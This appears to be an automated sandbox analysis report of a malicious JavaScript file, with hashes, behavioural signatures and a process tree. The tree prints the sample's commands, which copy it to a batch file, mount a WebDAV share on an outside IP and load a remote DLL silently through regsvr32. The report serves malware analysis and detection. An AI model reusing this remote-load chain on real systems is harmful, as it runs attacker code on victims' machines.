Analysis
-
max time kernel
92s -
max time network
99s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
08/07/2024, 17:51
Static task
static1
Behavioral task
behavioral1
Sample
2347325213288178791.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2347325213288178791.js
Resource
win10v2004-20240704-en
General
-
Target
2347325213288178791.js
-
Size
5KB
-
MD5
7b79ae18089412cd5788f57497135d0d
-
SHA1
d992f7bb6d4b60c02ac4ab2d93abbd1965941dae
-
SHA256
1c3936cfb4d3c23d0d4ec5a41570cf3d468f3ef3eed898a45f518d737eac1339
-
SHA512
e62fe18930946ffe0286b815f32628edfd46611bad6df2ee803100f5918045de32a29ca6444480ffa90ce4d938b50b93ee0d6921fb33edd4934841af7b9fc743
-
SSDEEP
48:Q3esJYM28VzZpav5VptCnHoxku43+qjJJdFd4xC40BMC3zI9jXodpTG89fdidTdT:QOrAVBHMkt7BEO98trGDmkMF
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3492 wrote to memory of 1052 3492 wscript.exe 83 PID 3492 wrote to memory of 1052 3492 wscript.exe 83 PID 1052 wrote to memory of 3892 1052 cmd.exe 86 PID 1052 wrote to memory of 3892 1052 cmd.exe 86 PID 1052 wrote to memory of 1956 1052 cmd.exe 87 PID 1052 wrote to memory of 1956 1052 cmd.exe 87
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2347325213288178791.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2347325213288178791.js" "C:\Users\Admin\\vrndqv.bat" && "C:\Users\Admin\\vrndqv.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:3892
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\507.dll3⤵PID:1956
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD57b79ae18089412cd5788f57497135d0d
SHA1d992f7bb6d4b60c02ac4ab2d93abbd1965941dae
SHA2561c3936cfb4d3c23d0d4ec5a41570cf3d468f3ef3eed898a45f518d737eac1339
SHA512e62fe18930946ffe0286b815f32628edfd46611bad6df2ee803100f5918045de32a29ca6444480ffa90ce4d938b50b93ee0d6921fb33edd4934841af7b9fc743